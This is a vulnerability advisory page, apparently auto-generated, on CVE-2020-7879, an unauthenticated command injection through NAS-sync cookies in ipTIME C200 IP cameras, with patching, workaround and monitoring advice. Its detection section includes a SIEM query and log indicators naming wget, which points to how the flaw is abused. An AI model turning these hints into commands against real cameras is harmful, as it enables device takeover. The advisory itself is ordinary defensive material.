Login Sign Up

CVE-2020-7879

8.8 HIGH
Remote Code Execution

📋 TL;DR

CVE-2020-7879 is an OS command injection vulnerability in ipTIME C200 IP cameras when synchronized with ipTIME NAS devices. Attackers can execute arbitrary commands on the camera by manipulating cookie values sent from the NAS without authentication. This affects organizations using vulnerable ipTIME camera/NAS combinations.

💻 Affected Systems

Products:
  • ipTIME C200 IP Camera
Versions: All versions prior to patched firmware
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Requires synchronization with ipTIME NAS devices to trigger the vulnerability.

📦 What is this software?

C200 Firmware by Iptime

View all CVEs affecting C200 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the IP camera allowing persistent access, lateral movement to other network devices, and use as a foothold for further attacks.

🟠

Likely Case

Remote code execution leading to camera compromise, surveillance disruption, and potential credential harvesting.

🟢

If Mitigated

Limited impact if cameras are isolated on separate VLANs with strict network segmentation.

🌐 Internet-Facing: HIGH - IP cameras are often exposed to the internet for remote access, making them prime targets.
🏢 Internal Only: MEDIUM - Still vulnerable to internal attackers or compromised devices on the same network.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires network access to the camera and knowledge of the synchronization mechanism.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor for latest firmware

Vendor Advisory: https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36365

Restart Required: Yes

Instructions:

1. Download latest firmware from ipTIME website. 2. Access camera web interface. 3. Navigate to firmware update section. 4. Upload and apply new firmware. 5. Reboot camera.

🔧 Temporary Workarounds

Disable NAS synchronization

all

Prevent the vulnerable synchronization feature from being used

Access camera web interface -> Settings -> NAS Sync -> Disable

Network segmentation

all

Isolate cameras on separate VLAN from critical systems

🧯 If You Can't Patch

  • Disable remote access to cameras and restrict to internal network only
  • Implement strict firewall rules blocking unnecessary ports and protocols

🔍 How to Verify

Check if Vulnerable:

Check if camera is synchronized with ipTIME NAS and examine firmware version against known vulnerable versions

Check Version:

Check camera web interface -> System Information -> Firmware Version

Verify Fix Applied:

Verify firmware version has been updated and test synchronization feature for command injection

📡 Detection & Monitoring

Log Indicators:

  • Unusual wget commands in system logs
  • Unexpected cookie values in HTTP requests
  • Abnormal process execution

Network Indicators:

  • Suspicious HTTP requests to camera with manipulated cookie headers
  • Unexpected outbound connections from camera

SIEM Query:

source="camera_logs" AND (wget OR cookie) AND command=*

📊 Metadata

CVE ID: CVE-2020-7879
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: November 30, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-7879, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)